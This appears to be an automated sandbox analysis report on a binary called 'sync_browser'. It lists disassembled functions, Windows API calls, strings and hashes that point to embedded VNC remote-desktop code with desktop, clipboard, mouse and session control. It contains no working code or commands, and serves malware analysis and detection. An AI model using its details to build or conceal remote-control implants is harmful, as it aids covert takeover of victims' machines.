FileTimeToLocalFileTime.KERNEL32 ref: 00007FF7400BA541
FileTimeToSystemTime.KERNEL32 ref: 00007FF7400BA559
FileTimeToLocalFileTime.KERNEL32 ref: 00007FF7400BA5BC
FileTimeToSystemTime.KERNEL32 ref: 00007FF7400BA5D4
FileTimeToLocalFileTime.KERNEL32 ref: 00007FF7400BA637
FileTimeToSystemTime.KERNEL32 ref: 00007FF7400BA64F
FindClose.KERNEL32 ref: 00007FF7400BA697
GetLastError.KERNEL32 ref: 00007FF7400BA6E4
FindClose.KERNEL32 ref: 00007FF7400BA6F4

Strings

./\, xrefs: 00007FF7400BA30E

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Time$File$_errno$FindLocalSystem__doserrno$Closefree$DriveErrorFirstLastType_getdrive_invalid_parameter_noinfo_wsopen_s
String ID: ./\
API String ID: 385398445-3176372042
Opcode ID: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
Instruction ID: cc10c5296fb0aad10eca85d1d67b27e26c557b14da4bf883c3afc10645df54c4
Opcode Fuzzy Hash: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
Instruction Fuzzy Hash: D4E16D6290C252C6EA64BF60A05427EF7B0FB86750F944035EA8D17BA9DF7DF854CB20

Function 00007FF740011D10 Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 209libraryloadersleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7400118A0: GetCurrentProcessId.KERNEL32 ref: 00007FF7400118B5
Part of subcall function 00007FF7400118A0: OpenProcess.KERNEL32 ref: 00007FF7400118C5

Part of subcall function 00007FF740011640: GetVersionExA.KERNEL32 ref: 00007FF740011671
Part of subcall function 00007FF740011640: GetModuleFileNameA.KERNEL32 ref: 00007FF7400116B3
Part of subcall function 00007FF740011640: GetPrivateProfileIntA.KERNEL32 ref: 00007FF740011767
Part of subcall function 00007FF740011640: GetPrivateProfileIntA.KERNEL32 ref: 00007FF740011790
Part of subcall function 00007FF740011640: GetPrivateProfileStringA.KERNEL32 ref: 00007FF7400117CE

WTSGetActiveConsoleSessionId.KERNEL32 ref: 00007FF740011D85
CreateEnvironmentBlock.USERENV ref: 00007FF740011DC8
SetLastError.KERNEL32 ref: 00007FF740011DD8
CreateProcessAsUserA.ADVAPI32 ref: 00007FF740011E2B
GetLastError.KERNEL32 ref: 00007FF740011E40
GetLastError.KERNEL32 ref: 00007FF740011E4B
LoadLibraryA.KERNEL32 ref: 00007FF740011E87
LoadLibraryA.KERNEL32 ref: 00007FF740011E97
GetProcAddress.KERNEL32 ref: 00007FF740011EB5
GetProcAddress.KERNEL32 ref: 00007FF740011ECD
Sleep.KERNEL32 ref: 00007FF740011F0B
DestroyEnvironmentBlock.USERENV ref: 00007FF740011F4C
SetLastError.KERNEL32 ref: 00007FF740011F57
CreateProcessAsUserA.ADVAPI32 ref: 00007FF740011FA2
GetLastError.KERNEL32 ref: 00007FF740011FB7
GetLastError.KERNEL32 ref: 00007FF740011FC2
LoadLibraryA.KERNEL32 ref: 00007FF740011FFE
LoadLibraryA.KERNEL32 ref: 00007FF74001200E
GetProcAddress.KERNEL32 ref: 00007FF74001202C
GetProcAddress.KERNEL32 ref: 00007FF740012044
Sleep.KERNEL32 ref: 00007FF740012082
CloseHandle.KERNEL32 ref: 00007FF7400120B3

Strings

LockWorkStation, xrefs: 00007FF740011EC3, 00007FF74001203A
Winsta0\Winlogon, xrefs: 00007FF740011D46
WinStationConnectW, xrefs: 00007FF740011EAB, 00007FF740012022
winsta.dll, xrefs: 00007FF740011E80, 00007FF740011FF7
h, xrefs: 00007FF740011D62
user32.dll, xrefs: 00007FF740011E8D, 00007FF740012004

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLast$AddressLibraryLoadProcProcess$CreatePrivateProfile$BlockEnvironmentSleepUser$ActiveCloseConsoleCurrentDestroyFileHandleModuleNameOpenSessionStringVersion
String ID: LockWorkStation$WinStationConnectW$Winsta0\Winlogon$h$user32.dll$winsta.dll
API String ID: 2898369102-3720325205
Opcode ID: a88697ad3902970c94e634d2ee006443711aca9222aabfc6e9aa9b8f1b329622
Instruction ID: dc9ad1ba6dab29b300c29bbb1d24d7797bd09793aefa5cf5dbd4d28818973472
Opcode Fuzzy Hash: a88697ad3902970c94e634d2ee006443711aca9222aabfc6e9aa9b8f1b329622
Instruction Fuzzy Hash: 09A11535A0CA86C6E664BF15B8402A9A3A0FF88780FC44139D99D47B69EF3DF445CB60

Function 00007FF740001DD0 Relevance: 45.3, APIs: 30, Instructions: 281clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF740001E04
EmptyClipboard.USER32 ref: 00007FF740001E1B
CloseClipboard.USER32 ref: 00007FF740001E25

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseEmptyOpen
String ID:
API String ID: 1427272684-0
Opcode ID: 71ad19a431d06b663c1a9cd73ece8f0cf1ab1915d908a295cc5594be5b48716c
Instruction ID: 1746782ec1d52412251a28ee772d124c85b243b45d0bf4c1b5b1541b92a20813
Opcode Fuzzy Hash: 71ad19a431d06b663c1a9cd73ece8f0cf1ab1915d908a295cc5594be5b48716c
Instruction Fuzzy Hash: 5BC10831B0DB02D6EA24BF65A8541B9A3A1BF59B84B845039DE1E477B9EF3CF444C360

Function 00007FF740033460 Relevance: 44.1, APIs: 13, Strings: 12, Instructions: 369windowclipboardCOMMON

Download Yara Rule

APIs

GetWindowLongPtrA.USER32 ref: 00007FF74003349B
DefWindowProcA.USER32 ref: 00007FF7400337AF
GetClipboardOwner.USER32 ref: 00007FF740033809
EnterCriticalSection.KERNEL32 ref: 00007FF740033848
LeaveCriticalSection.KERNEL32 ref: 00007FF740033868
SendNotifyMessageA.USER32 ref: 00007FF740033889
DefWindowProcA.USER32 ref: 00007FF7400338E5

Strings

vncdesktopsink.cpp : unset W8 hooks OK, xrefs: 00007FF740033C9D
vncdesktopsink.cpp : Monitor3 %i %i, xrefs: 00007FF740033789
vncdesktopsink.cpp : Monitor22 %i, xrefs: 00007FF740033769
vncdesktopsink.cpp : set W8 hooks OK, xrefs: 00007FF74003392C
vncdesktopsink.cpp : Power3 %i %i, xrefs: 00007FF7400338C2
vncdesktopsink.cpp : set hooks OK, xrefs: 00007FF740033A60
vncdesktopsink.cpp : Unsethooks OK, xrefs: 00007FF740033D0C
vncdesktopsink.cpp : Monitor222 %i, xrefs: 00007FF7400338A2
vncdesktopsink.cpp : set SC hooks OK, xrefs: 00007FF740033965
vncdesktopsink.cpp : failed to set system hooks, xrefs: 00007FF740033A36
vncdesktopsink.cpp : Unsethooks Failed, xrefs: 00007FF740033D03
vncdesktopsink.cpp : unset SC hooks OK, xrefs: 00007FF740033CC1

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Window$CriticalProcSection$ClipboardEnterLeaveLongMessageNotifyOwnerSend
String ID: vncdesktopsink.cpp : Monitor22 %i$vncdesktopsink.cpp : Monitor222 %i$vncdesktopsink.cpp : Monitor3 %i %i$vncdesktopsink.cpp : Power3 %i %i$vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : failed to set system hooks$vncdesktopsink.cpp : set SC hooks OK$vncdesktopsink.cpp : set W8 hooks OK$vncdesktopsink.cpp : set hooks OK$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
API String ID: 378279424-2704384803
Opcode ID: 00ad34b858e2698ec28211d85957e875018bbeb98cc9b0c5072344c1147ce0c1
Instruction ID: 064e73ff99a8f58ea3a5332d5e25a87550a697c0fa0103f24b591393310579ee
Opcode Fuzzy Hash: 00ad34b858e2698ec28211d85957e875018bbeb98cc9b0c5072344c1147ce0c1
Instruction Fuzzy Hash: A5027022A0C682D7FA6ABB25D6947B8A3A4FF41B40F944535CA1D533B9CF7CB458C320

Function 00007FF7400354A0 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 301COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF740035502
GetRegionData.GDI32 ref: 00007FF740035632
GetRegionData.GDI32 ref: 00007FF740035655
CreateRectRgn.GDI32 ref: 00007FF740035691
GetRegionData.GDI32 ref: 00007FF7400356B9
LeaveCriticalSection.KERNEL32 ref: 00007FF740035902

Strings

F, xrefs: 00007FF7400354F7

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: DataRegion$CriticalSection$CreateEnterLeaveRect
String ID: F
API String ID: 2411647221-1304234792
Opcode ID: 3eacc1ec8eb3fbd81f3eab9d0f5820d06a9a4d22da5eaeb56aec88f07a7f87b3
Instruction ID: 9cc016a82fa4c77a5f85a9ca03b29ddcda3c960d836caa3b3bd2e91d6b0b5f51
Opcode Fuzzy Hash: 3eacc1ec8eb3fbd81f3eab9d0f5820d06a9a4d22da5eaeb56aec88f07a7f87b3
Instruction Fuzzy Hash: 87C17D2660CA82C6E610FB16E4447A9B7A1FF88B84F958031DE5E43769DF3CE445C720

Function 00007FF740026DD1 Relevance: 40.8, APIs: 15, Strings: 8, Instructions: 552filestringCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF74002407F
CloseDesktop.USER32 ref: 00007FF7400240C2
GetLogicalDriveStringsA.KERNEL32 ref: 00007FF740026DF7
GetDriveTypeA.KERNEL32 ref: 00007FF740026E64
SHGetMalloc.SHELL32 ref: 00007FF74002705C
SHGetSpecialFolderLocation.SHELL32 ref: 00007FF740027072
SHGetPathFromIDListA.SHELL32 ref: 00007FF740027087
SetErrorMode.KERNEL32 ref: 00007FF740027131
FindFirstFileA.KERNEL32 ref: 00007FF740027147
SetErrorMode.KERNEL32 ref: 00007FF740027152
lstrlenA.KERNEL32 ref: 00007FF740027288
FindNextFileA.KERNEL32 ref: 00007FF740027346
FindClose.KERNEL32 ref: 00007FF74002735A
LeaveCriticalSection.KERNEL32 ref: 00007FF740027BAC

Strings

Desktop, xrefs: 00007FF740027011
vncservice.cpp : SelectDesktop , xrefs: 00007FF74002404B
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF740024060
Network Favorites, xrefs: 00007FF740027030
f, xrefs: 00007FF740026E99
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF74002409A
My Documents, xrefs: 00007FF740026FED
vncclient.cpp : vncClientThread , xrefs: 00007FF740024029

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Find$CloseDesktopDriveErrorFileMode$CriticalFirstFolderFromInputLeaveListLocationLogicalMallocNextOpenPathSectionSpecialStringsTypelstrlen
String ID: Desktop$My Documents$Network Favorites$f$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 2965397059-206656798
Opcode ID: 2db8000c453640fe1383c1b2e2e44d3cb64826df7eb8e4b981688ca979fb9bf6
Instruction ID: d18f138f9af4bc8773527762cef3371561296544662d152414e93afdf46476b6
Opcode Fuzzy Hash: 2db8000c453640fe1383c1b2e2e44d3cb64826df7eb8e4b981688ca979fb9bf6
Instruction Fuzzy Hash: 9D42B022A0C682C5EB60BB35C8587FD67A1EB85798F840239DA1D477E9DF38F945C720

Function 00007FF740024D7E Relevance: 38.9, APIs: 18, Strings: 4, Instructions: 441COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF74002407F
CloseDesktop.USER32 ref: 00007FF7400240C2
GetSystemMetrics.USER32 ref: 00007FF740024E33
GetSystemMetrics.USER32 ref: 00007FF740024EBE
mouse_event.USER32 ref: 00007FF740024FBA
GetSystemMetrics.USER32 ref: 00007FF740024FE7
GetSystemMetrics.USER32 ref: 00007FF74002500B
GetSystemMetrics.USER32 ref: 00007FF740025027
GetSystemMetrics.USER32 ref: 00007FF740025046
GetCursorPos.USER32 ref: 00007FF7400250B1
SystemParametersInfoA.USER32 ref: 00007FF7400250D8
SystemParametersInfoA.USER32 ref: 00007FF7400250EA
SystemParametersInfoA.USER32 ref: 00007FF74002510E
SystemParametersInfoA.USER32 ref: 00007FF740025122
mouse_event.USER32 ref: 00007FF740025149
SystemParametersInfoA.USER32 ref: 00007FF740025163
SystemParametersInfoA.USER32 ref: 00007FF740025175

Strings

vncservice.cpp : SelectDesktop , xrefs: 00007FF74002404B
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF740024060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF74002409A
vncclient.cpp : vncClientThread , xrefs: 00007FF740024029

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: System$InfoMetricsParameters$Desktopmouse_event$CloseCursorInputOpen
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 246551654-3977938048
Opcode ID: 8a846c19ca448c6dfd4fc0fae66a9b6d9b90a853b31161baa3ad83bdd6464dec
Instruction ID: 2c0f828952579c9d6fea332863b6335b67a90bcb5105f29f26a08eeef54be5df
Opcode Fuzzy Hash: 8a846c19ca448c6dfd4fc0fae66a9b6d9b90a853b31161baa3ad83bdd6464dec
Instruction Fuzzy Hash: 1E228D32A0C691C6E764BB35D4587EEB7A1FB85748F85403ACA4D477A8CF38E954C720

Function 00007FF740018590 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 266threadlibraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7400185D3
GetProcAddress.KERNEL32 ref: 00007FF7400185EF
EnumDisplaySettingsA.USER32 ref: 00007FF74001862B
EnumDisplaySettingsA.USER32 ref: 00007FF7400186BD
FreeLibrary.KERNEL32 ref: 00007FF74001874B
GetCurrentThreadId.KERNEL32 ref: 00007FF7400188B9
GetThreadDesktop.USER32 ref: 00007FF7400188C1
OpenInputDesktop.USER32 ref: 00007FF7400188D9
SetThreadDesktop.USER32 ref: 00007FF7400188EA
ChangeDisplaySettingsExA.USER32 ref: 00007FF74001890C
ChangeDisplaySettingsExA.USER32 ref: 00007FF740018929
SetThreadDesktop.USER32 ref: 00007FF740018939
CloseDesktop.USER32 ref: 00007FF740018947
FreeLibrary.KERNEL32 ref: 00007FF740018950
FreeLibrary.KERNEL32 ref: 00007FF740018968

Strings

, xrefs: 00007FF740018846
mv2, xrefs: 00007FF740018836
EnumDisplayDevicesA, xrefs: 00007FF7400185E5
USER32, xrefs: 00007FF7400185BC
\DEVICE, xrefs: 00007FF74001879A
DEVICE0, xrefs: 00007FF7400187C8
mv video hook driver2, xrefs: 00007FF740018724

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$DisplayLibrarySettingsThread$Free$ChangeEnum$AddressCloseCurrentInputLoadOpenProc
String ID: $DEVICE0$EnumDisplayDevicesA$USER32$\DEVICE$mv video hook driver2$mv2
API String ID: 1729393483-4131161223
Opcode ID: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
Instruction ID: 7caba5138da4d6484ba0f98b83957014c7338a48ef4757a1c44ee353d072d338
Opcode Fuzzy Hash: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
Instruction Fuzzy Hash: 72B18A32A0D682C6EB60BB24A8402B9B3A0EF45754FD44135DE5D5BBA8EF3DE605C720

Function 00007FF740017B90 Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 227fileCOMMON

Download Yara Rule

APIs

InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF740017BFC
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF740017C14
ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32 ref: 00007FF740017C2E
GetLastError.KERNEL32 ref: 00007FF740017C36
GetSecurityDescriptorSacl.ADVAPI32 ref: 00007FF740017C63
SetSecurityDescriptorSacl.ADVAPI32 ref: 00007FF740017C82
CreateFileMappingA.KERNEL32 ref: 00007FF740017E52
MapViewOfFile.KERNEL32 ref: 00007FF740017E82
CreateEventA.KERNEL32 ref: 00007FF740017EA4
CreateEventA.KERNEL32 ref: 00007FF740017EC2
CreateFileMappingA.KERNEL32 ref: 00007FF740017EF6
MapViewOfFile.KERNEL32 ref: 00007FF740017F23
CreateEventA.KERNEL32 ref: 00007FF740017F49
CreateEventA.KERNEL32 ref: 00007FF740017F6B

Strings

fm_OUT, xrefs: 00007FF740017D6E
Global\, xrefs: 00007FF740017CA1, 00007FF740017CBC, 00007FF740017CD0, 00007FF740017CEF, 00007FF740017D03, 00007FF740017D22
event_OUT_DONE, xrefs: 00007FF740017E16
fm_IN, xrefs: 00007FF740017D48
event_OUT, xrefs: 00007FF740017DEC
S:(ML;;NW;;;LW), xrefs: 00007FF740017C24
event_IN, xrefs: 00007FF740017D98
event_IN_DONE, xrefs: 00007FF740017DC2

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateDescriptorSecurity$EventFile$MappingSaclView$ConvertDaclErrorInitializeLastString
String ID: Global\$S:(ML;;NW;;;LW)$event_IN$event_IN_DONE$event_OUT$event_OUT_DONE$fm_IN$fm_OUT
API String ID: 1989023930-362996323
Opcode ID: 110fc2717108ebff6e53033f8ff6c374a8661c63bf5c686a461652ab7439fbc0
Instruction ID: a2ff61512fd5d4d0bd4ed5da7f70de1bdbb6e6a2ecd49581dbd933a49b2a3e3a
Opcode Fuzzy Hash: 110fc2717108ebff6e53033f8ff6c374a8661c63bf5c686a461652ab7439fbc0
Instruction Fuzzy Hash: CCB17E21608B82D2EA54FB60A451BEAA3A0FF89754FC04031EB5D17BA9DF3DF519C750

Function 00007FF740012E40 Relevance: 36.8, APIs: 14, Strings: 7, Instructions: 95serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 00007FF740012E5D
OpenServiceA.ADVAPI32 ref: 00007FF740012EAD
GetLastError.KERNEL32 ref: 00007FF740012EBB
CloseServiceHandle.ADVAPI32 ref: 00007FF740012EE0

Part of subcall function 00007FF74000A040: OpenInputDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A07A
Part of subcall function 00007FF74000A040: GetCurrentThreadId.KERNEL32 ref: 00007FF74000A083
Part of subcall function 00007FF74000A040: GetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A08B
